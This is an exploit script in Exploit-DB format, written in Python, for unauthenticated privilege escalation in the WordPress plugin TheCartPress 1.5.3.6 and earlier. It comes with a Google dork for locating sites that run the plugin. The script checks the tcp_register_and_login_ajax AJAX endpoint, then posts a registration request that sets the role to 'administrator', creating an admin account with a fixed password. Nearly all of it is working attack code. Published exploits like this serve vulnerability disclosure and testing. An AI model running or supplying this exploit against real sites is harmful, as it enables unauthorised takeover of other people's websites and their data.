# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
print("Author -> space_hen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url]")
print("Ex: python3 exploit.py https://example.com")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("User name is required" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 2):
print_usage();
sys.exit(1);
base = sys.argv[1]
ajax_action = 'tcp_register_and_login_ajax'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
data = {
"tcp_new_user_name" : "admin_02",
"tcp_new_user_pass" : "admin1234",
"tcp_repeat_user_pass" : "admin1234",
"tcp_new_user_email" : "test@test.com",
"tcp_role" : "administrator"
}
print("Inserting admin...");
response = requests.post(uri, data=data )
if (response.text == "\"\""):
print("Success!")
print("Now login at /wp-admin/")
else:
print(response.text)
main();